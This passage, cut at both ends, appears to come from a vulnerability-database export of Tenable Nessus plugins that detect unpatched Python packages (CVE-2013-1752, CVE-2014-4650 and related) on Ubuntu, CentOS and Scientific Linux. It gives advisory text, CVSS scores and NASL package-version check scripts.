reference:\"python3-docs-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-3.3.2-14.1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"tkinter3-apps-3.3.2-14.1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:45:18", "description": "It was discovered that multiple Python protocol libraries incorrectly limited certain data when connecting to servers. A malicious ftp, http, imap, nntp, pop or smtp server could use this issue to cause a denial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking gzip-compressed HTTP bodies. A malicious server could use this issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain argument. An attacker could possibly use this issue to read arbitrary memory and expose sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled URL-encoded path separators in URLs. A remote attacker could use this issue to expose sensitive information, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in buffer functions. An attacker could possibly use this issue to read arbitrary memory and obtain sensitive information. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-26T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:python2.7", "p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.2", "p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal", "p-cpe:/a:canonical:ubuntu_linux:python3.4", "p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2653-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2653-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84428);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_bugtraq_id(63804, 66958, 68119, 68147, 70089);\n script_xref(name:\"USN\", value:\"2653-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : python2.7, python3.2, python3.4 vulnerabilities (USN-2653-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that multiple Python protocol libraries incorrectly\nlimited certain data when connecting to servers. A malicious ftp,\nhttp, imap, nntp, pop or smtp server could use this issue to cause a\ndenial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit\nunpacking gzip-compressed HTTP bodies. A malicious server could use\nthis issue to cause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a\ncertain argument. An attacker could possibly use this issue to read\narbitrary memory and expose sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this\nissue to expose sensitive information, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.\n(CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only\naffected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2653-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python2.7-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.2-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python3.4-minimal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2021 Canonical, Inc. / NASL script (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.3-0ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"python3.2-minimal\", pkgver:\"3.2.3-0ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.6-8ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.0-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python2.7-minimal\", pkgver:\"2.7.8-10ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"python3.4-minimal\", pkgver:\"3.4.2-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2.7 / python2.7-minimal / python3.2 / python3.2-minimal / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:11:09", "description": "Updated python packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme, or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable certificate verification by default. However, for backwards compatibility, verification remains disabled by default. Future updates may change this default. Refer to the Knowledgebase article 2039753 linked to in the References section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error. Subprocesses have been fixed to close the file descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile argument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "CentOS 7 : python (CESA-2015:2101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:python", "p-cpe:/a:centos:centos:python-debug", "p-cpe:/a:centos:centos:python-devel", "p-cpe:/a:centos:centos:python-libs", "p-cpe:/a:centos:centos:python-test", "p-cpe:/a:centos:centos:python-tools", "p-cpe:/a:centos:centos:tkinter", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# CentOS Errata and Security Advisory 2015:2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87129);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"CentOS 7 : python (CESA-2015:2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-November/002560.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2883d9e8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7185\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:43:49", "description": "It was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file descriptors only once.\n\n - When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout.\n\n - The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n\n - The load_cert_chain() function now accepts 'None' as a keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : python on SL7.x x86_64 (20151119)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:python", "p-cpe:/a:fermilab:scientific_linux:python-debug", "p-cpe:/a:fermilab:scientific_linux:python-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-devel", "p-cpe:/a:fermilab:scientific_linux:python-libs", "p-cpe:/a:fermilab:scientific_linux:python-test", "p-cpe:/a:fermilab:scientific_linux:python-tools", "p-cpe:/a:fermilab:scientific_linux:tkinter", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151119_PYTHON_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87570", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87570);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n\n script_name(english:\"Scientific Linux Security Update : python on SL7.x x86_64 (20151119)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nThis update also fixes the following bugs :\n\n - Subprocesses used with the Eventlet library or regular\n threads previously tried to close epoll file descriptors\n twice, which led to an 'Invalid argument' error.\n Subprocesses have been fixed to close the file\n descriptors only once.\n\n - When importing the readline module from a Python script,\n Python no longer produces erroneous random characters on\n stdout.\n\n - The cProfile utility has been fixed to print all values\n that the '-s' option supports when this option is used\n without a correct value.\n\n - The 